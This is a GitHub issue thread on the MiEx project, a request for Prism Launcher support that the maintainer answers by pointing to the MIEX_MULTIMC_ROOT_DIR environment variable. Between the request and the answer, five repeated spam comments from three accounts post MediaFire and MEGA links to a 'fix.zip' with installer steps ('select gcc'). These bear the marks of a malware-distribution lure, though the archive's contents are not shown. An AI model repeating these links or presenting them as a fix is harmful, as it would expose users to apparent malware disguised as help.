### ISSUE TITLE
Add support for getting minecraft from Prismlauncher

### ISSUE THREAD

**Issue by hl2jeep** [BramStoutProductions/MiEx#106]
basically the title. I don't use the regular launcher and don't intend on doing so, it would make it much easier if i could just specify my prismlauncher install directory

**Comment by Gamez2** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by BramStout** [comment]
You actually can! Prism is a fork of MultiMC and MiEx supports MultiMC and therefore also Prism. All that you have to do is set up the following environment variable in Windows to point to the root directory of the Prism installation: `MIEX_MULTIMC_ROOT_DIR`

You can read more about environment variables in MiEx here: https://github.com/BramStoutProductions/MiEx/wiki/3.-Pipeline-Integration#environment-variables
